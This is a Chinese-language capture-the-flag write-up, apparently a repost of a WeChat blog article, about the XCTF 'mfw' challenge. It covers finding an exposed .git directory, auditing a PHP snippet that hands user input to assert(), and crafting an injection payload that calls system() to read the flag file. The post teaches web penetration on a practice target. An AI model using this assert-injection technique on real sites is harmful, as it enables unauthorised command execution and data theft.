基于mfw靶场实战的注入渗透
2023-1-13 09:9:43 Author: 白安全组(查看原文) 阅读量:11 收藏

前言:

本来想写一篇关于代码审计方面的,但是考虑到公众号新手很多,所以我想了想还是发一篇关于靶场的文章,这里有一小部分的代码审计,也算是一个小的实战环境了,因为这里也涉及到一些小的知识点,大家可以去靶场练练手。

基于以下靶场:

https://adworld.xctf.org.cn/challenges/details?hash=52595c4f-b564-4c87-a2fa-390e2529b5b4_2&task_category_id=3

解题思路,遇到陌生的一个网站,我们首要的是搜集一些信息,我们可以先着手收集一些明面上的信息,比如我们可以扫描一下网站目录。

这里通过扫描网站目录我们可以发现有一个/.git的目录,这个目录我们根据经验了解 git目录是程序员合作项目遗留

我们这里可以利用一个工具将其全部下载下来,当然我们也可以通过手动一个个下载下来。

这里我利用工具下载了这里面的源码,然后我们可以进行一小波代码审计

<?php
if (isset($_GET['page'])) { $page = $_GET['page'];} else { $page = "home";}
$file = "templates/" . $page . ".php";
// I heard '..' is dangerous!assert("strpos('$file', '..') === false") or die("Detected hacking attempt!");
// TODO: Make this look niceassert("file_exists('$file')"or die("That file doesn't exist!");?>

首先这里通过page利用get方式传入一个值,这个值需要与page相等,否则赋值home哥page

然后我们发现下面的file变量会将我们传递进去的参数加上php后缀放入到目录中

然后我们继续往下读,这里发现使用了assert函数,这里就和我们的一句话木马有点相似了啊。

我们的file变量会被带入到这一句中,那么我们就可以进行一个闭合没用的,插入我们想要执行的函数进去了

assert("strpos('$file', '..') === false")

我们想办法让这里闭合

'.system("cat ./templates/flag.php").'

这样构造之后,让前后闭合,同时可以执行中间的语句

出来之后我们查看网站源码


文章来源: http://mp.weixin.qq.com/s?__biz=MzU4MjYxNTYwNA==&mid=2247486347&idx=1&sn=bf56cb6da7a06a5fd15b4f05cfbc5ba0&chksm=fdb4dcd0cac355c6f2848ce5ad83fe164a973521ff638e64fae367a6fd8272fcbaa801dee71c#rd
如有侵权请联系:admin#unsafe.sh